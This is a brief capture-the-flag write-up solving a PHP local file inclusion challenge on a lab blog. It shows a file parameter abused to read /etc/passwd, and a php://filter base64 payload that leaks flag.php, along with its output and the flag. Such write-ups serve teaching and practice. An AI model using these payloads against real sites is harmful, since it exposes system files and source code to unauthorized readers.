Did you check out my blog posts?
http://ez.ctf.cafe:9999
robots will rule the world!
Let's Visit the website
When you visit http://ez.ctf.cafe:9999/flag.php you will get a hint.
Here it is: How do you filter your coffee?
okay, good! we can see that we are on the right path, now, let's see the blog. Click the 'Read More' button on the blog. You will be redirected to `http://ez.ctf.cafe:9999/blog-posts.php?file=blog1.html`
Perfection! you can see there is a file parameter. Let's try to do `/etc/passwd` on that parameter
/etc/passwd in file parameter (working!) So, now let's find the flag. I have used flag, /home/flag, /root/flag, but got no luck.
Then, I remembered the hint flag.php and then find the payload with filter in PHP.
Luckily, I got this one, thanks to PayloadAllThings
PayloadAllThingsUse this payload and boom, you will get string,
`http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php`
Output String: PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K
This is a base64 encoded string, decode it with a base64 decoder
On decoding string, it will show the flag!!! 🎉
EZ-CTF{LFI_1S_3Z}
